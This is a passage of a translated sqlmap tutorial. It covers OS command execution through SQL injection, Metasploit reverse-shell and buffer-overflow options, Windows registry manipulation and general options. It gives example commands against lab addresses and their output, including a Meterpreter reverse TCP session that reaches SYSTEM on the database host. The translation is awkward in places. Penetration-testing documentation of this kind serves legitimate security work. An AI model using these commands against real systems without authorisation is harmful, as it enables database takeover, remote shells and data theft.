XV, operating system control 1. Execute any operating system command
Parameters:--os-cmd and--os-shell
If the database management system is MySQL, PostgreSQL, or Microsoft SQL Server and the current user has the relevant permissions sqlmap can use SQL injection to execute arbitrary operating system commands.
When the database management system is MySQL or PostgreSQL, Sqlmap will upload a binary shared library file containing user-defined functions sys_exec () and Sys_eval () using the File upload feature described previously, and then create these two user-defined functions, Executes a user-specified command through one of these two functions. Which function to choose depends on whether the user wants to display the standard output of the command execution.
When the database management system is Microsoft's SQL Server, Sqlmap executes arbitrary commands through the stored procedure xp_cmdshell. If xp_cmdshell is disabled (it is disabled by default when SQL Server >= 2005) Sqlmap will enable it, and if xp_cmdshell does not exist, Sqlmap will create it.
When the user wants to see the standard output of the command execution, Sqlmap uses an enumerable injection technique (blind, in-band, and error-based injection), and the heap query injection technique is used to execute the command when the user does not want to see the standard output of the command execution.
The goal of the following example is PostgreSQL:
python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --os-cmd id -v 1
Some of the output is as follows:
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF ‘sys_eval‘ already exist
[hh:mm:12] [INFO] checking if UDF ‘sys_exec‘ already exist
[hh:mm:12] [INFO] creating UDF ‘sys_eval‘ from the binary UDF file
[hh:mm:12] [INFO] creating UDF ‘sys_exec‘ from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
‘uid=104(postgres) gid=106(postgres) groups=106(postgres)‘
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF ‘sys_eval‘? [Y/n] y
do you want to remove UDF ‘sys_exec‘? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually
Use the parameter "--os-shell" to simulate a shell that can execute arbitrary commands, like "--sql-shell" the shell can also be complete with the TAB key to support history.
When a heap query is not supported (such as PHP or Asp+mysql) and the database management system is Mysql, it is still possible to create a Web backdoor through this web backdoor through a SELECT clause into outfile in the writable directory of the host on which the Web is hosted to execute commands. Sqlmap supports this technology and requires users to provide a comma-separated path that may be a writable directory. SQLMAP supports the following server-side scripting languages:
2. Out-of-band TCP connection: Meterpreter and related
Parameters:--os-pwn 、--os-smbrelay 、--os-bof 、--priv-esc 、--Msf-path and--tmp-path
If the database management system is MySQL, PostgreSQL, or Microsoft SQL Server and the current user has the relevant permissions Sqlmap it is possible to establish an out-of-band TCP connection between the host of the attacker and the host where the database resides. Depending on the user's choice, this connection can be an interactive command Shell,meterpreter session or a graphical user interface (VNC) session.
Sqlmap to build Shellcode by Metasploit, there are four techniques to perform shellcode on the host where the database resides:
- The database executes Metasploit shellcode in memory using the user-defined function sys_bineval () created by Sqlmap. Support for MySQL and PostgreSQL. The parameter "--os-pwn".
- Upload and execute Metasploit ' stand-alone payload by Sqlmap own user-defined functions (MySQL and PostgreSQL in Sys_exec (), Microsoft SQL Server xp_cmdshell ()) Stager ". Parameter: "--os-pwn".
- Exploit remote code execution vulnerability ms08-068. The attacker's machine uses Metasploit Smb_relay to listen for connections from the target machine. Requires running Sqlmap with Root on Linux/unix and the target DBMS running on Windows with administrator privileges. Parameter: "--os-smbrelay".
- A heap buffer Overflow Vulnerability (MS09-004) in Microsoft SQL Server 2000 and 2005 that can be sp_replwritetovarbin through stored procedures executes Metasploit shellcode in memory. Sqlmap has its own data Execution protection bypass technology that can successfully exploit vulnerabilities, but requires Metasploit generation Shellcode to execute shellcode when a vulnerability is successfully exploited. Parameter: "--os-bof".
Here is an example of MySQL targeting:
python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit
[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[hh:mm:33] [INFO] checking if UDF ‘sys_bineval‘ already exist
[hh:mm:33] [INFO] checking if UDF ‘sys_exec‘ already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF ‘sys_bineval‘ from the binary UDF file
[hh:mm:34] [INFO] creating UDF ‘sys_exec‘ from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database und
erlying operating system?
[1] Via UDF ‘sys_bineval‘ (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on
all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12272 updated 4 days ago (2011.04.07)
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF ‘sys_bineval‘, please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The ‘priv‘ extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address : 192.168.136.129
Netmask : 255.255.255.0
meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
In Windows, MySQL runs as system by default, but PostgreSQL runs as a low-privileged user postgres both in Windows and Linux. SQL Server 2000 runs as system by default, but SQL Server 2005 to 2008 runs most of the time as Network service, and in a few cases runs as a local service.
Use the parameter "--priv-esc" to execute the Metasploit getsystem command to try to elevate the permissions.
16. Windows Registry Operations
The Windows registry can be manipulated if the following conditions are true:
- The target database management system is running on windows
- The target database management system is MySQL, PostgreSQL, or Microsoft SQL Server
- Support for Heap queries
- The target database management system has sufficient permissions for the current user
1. Read the Windows registry key value
Parameter:--reg-read
2. Write Windows registry key values
Parameter:--reg-add
3. Delete Windows registry key values
Parameter:--reg-del
4. Auxiliary
Parameters:--reg-key 、--reg-value 、--reg-data and--reg-type
Proper use of the above parameters allows you to add or modify a Windows registry key value in a command without having to provide data in a question-and-answer manner while the Sqlmap is running.
- --reg-key: Specifies the path of the Windows registry key value
- --reg-value: Specifies the key for the Windows registry key value
- --reg-data: Specifies the value of the Windows registry key value
- --reg-type: Specifies the data type of the value of the Windows registry key value
Here is an example:
python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
17. General Options 1. Load Sqlmap Session from SQLite file
Parameter:-S
Sqlmap automatically creates a long-saved session SQLite file for each target, which is stored uniformly in a specific directory (such as: ~/.sqlmap/output/), which holds all the data needed to recover the session. Use this parameter if you want to explicitly specify an SQLite file (for example, if you want to store data from multiple destinations in the same SQLite file).
2. Logging http (S) traffic to the log file
Parameter:-T
This parameter is followed by a file path, which is used to log HTTP (S) requests and responses in text format to a file. Such a log is useful when debugging.
3. Non-interactive mode
Parameter:--batch
Use this parameter to allow Sqlmap to run in non-interactive mode, and all required inputs will be taken to the default values.
4. Set character encoding
Parameter:--charset
To decode the data correctly, Sqlmap uses the information provided by the Web server (such as the character encoding settings in the HTTP header), or uses a third-party library Chardet to heuristic the character encoding.
You can use the parameter "--charset" to specify character encodings, such as "--CHARSET=GBK".
5. Crawl the target site starting from the destination URL
Parameter:--crawl
Sqlmap can start crawling the target site from the destination URL and collect URLs that may be vulnerable. Using this parameter also requires setting the crawl depth, which is relative to the destination URL where the crawl was started. The crawl ends only after all new links have been recursively accessed. It is recommended that this parameter be used in conjunction with "--delay".
The following example targets the MySQL:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
Some of the output is as follows:
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset ‘ascii‘
[xx:xx:00] [INFO] 42/56 links visited (75%)
Parameter:--crawl-exclude
Following this parameter is followed by a regular expression that excludes URLs that you do not want to crawl. If the URL matches the regular, it is not crawled. Use "--crawl-exclude=logout" to exclude all URLs that contain the string "logout".
6. Set the delimiter in the output CSV file
Parameter:--csv-del
When the data is output to a CSV file (--dump-format=csv), the default is delimited by "," and you can use this parameter to specify the delimiter. such as: "--csv-del="; "".
7. Database management System authentication credentials
Parameter:--dbms-cred
In some cases, due to the low current user rights of the database management system resulting in an action failure, you can use this parameter to provide the Admin user authentication credentials, Sqlmap will specifically use the "run as" mechanism for failed parts (such as: Microsoft SQL The OPENROWSET of the server) re-executes the failed action as the Admin user. Of course, you need to know the Admin user authentication credentials.
8. Data output format
Parameter:--dump-format
Sqlmap has three different output formats for the enumerated data: CSV, HTML, and SQLite. The default is CSV format, each data table is saved in a text file, one row is a record, separated by commas (or "--csv-del" to specify the delimiter). Select HTML format, all data is stored in an HTML file, the data is stored in a table. Choose the SQLite format, all data is saved in a SQLite file, SQLite table name and structure will be the same as the original table.
9. Estimated time of completion
Parameter:--eta
This parameter is used to display the estimated finish time. The following example is a Boolean blind that targets Oracle:
python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
Some of the output is as follows:
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========> ] 11/64
Then:
100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:
‘Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod‘
As you can see, Sqlmap calculates the length of the query output, then estimates the completion time, displays the percent progress bar, and counts the data that has been accepted.
10. Refresh the session file
Parameter:--flush-session
Use this parameter to refresh the session file to avoid some problems that may be caused by the SQLMAP default caching mechanism. The premise of using this parameter is to really understand the concept of a session file. Another possible way is to manually delete the session file.
11. Parsing and Testing form input fields
Parameter:--forms
In addition to using "-R" and "--data" to test whether the form data has an injection point, you can also use the parameter "--forms" to test whether the form data has an injection point.
Using both the parameter "--forms" and "-U", the sqlmap resolves the target URL (the one specified by "-U") back to the form on the page, testing whether the form has an injection point, and does not inject test to the destination URL.
12. Ignore query results in the session file
Parameter:-fresh-queries
Use this parameter to ignore query results in the session file to re-execute the query.
13. Use the hex function for return results
Parameter:--hex
Non-ASCII data can be easily transmitted in error, using the hex function to return the data in the target database in hexadecimal.
The goal of the following example is PostgreSQL:
python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors
Some of the output is as follows:
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR
(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: ‘pg_query() [<a href=‘function.pg-query‘>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>‘
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
14. Specify the output directory path
Parameter:--output-dir
Sqlmap the session and result files are saved to a subdirectory output by default, you can use this parameter to specify the output directory, such as: "--output-dir=/tmp".
15. Parsing the DBMS's error message from the response
Parameter:--parse-errors
If the Web application is configured for debug mode, it is likely that SQL error messages will be displayed in the HTTP response page. These error messages are useful for understanding the cause of an operation failure. For example, the failure error message that is caused by insufficient permissions is similar to this: "Access denied for user".
The goal of the following example is Microsoft SQL Server:
python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
Some of the output is as follows:
[xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the timeneeded to find the right number of query columns. Automatically extending the rangefor current UNION query injection technique test
[xx:xx:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>‘
[xx:xx:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>‘
[xx:xx:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>‘
[xx:xx:17] [INFO] target URL appears to have 3 columns in query
16. Specify the middle axis column
Parameter:--pivot-column
Sometimes (as in Microsoft SQL Server, Sybase, and SAP MaxDB) it is not possible to enumerate data table records directly using offset m,n because of a lack of a similar mechanism. In this case, Sqlmap enumerates the data by determining the most appropriate axis column (the most unique value), and the value of the axis column is later used to retrieve other column values.
If the automatic selection fails, you need to manually specify the middle axis column using this parameter, such as: "--pivot-column=id".
17. Save the options in the configuration file
Parameter:--save
Use this parameter to save the SQLMAP command-line parameter to the configuration file, which can be edited and loaded with the parameter "-C". The configuration file is in INI format.
18. Upgrade Sqlmap
Parameter:--update
With this parameter you can upgrade the Sqlmap, and obviously need to be able to connect to the Internet. In the event of a failure, you can perform a "git pull" in the Sqlmap installation directory to upgrade the Sqlmap. There are no GIT commands in Windows that can use GIT clients like smartgit.
In fact, "--update" and "Git Pull" upgrade the Sqlmap in the same way, getting the latest source code from the Git repository.
It is highly recommended to upgrade Sqlmap before reporting bugs
Safety Test ===sqlmap (iii) reprint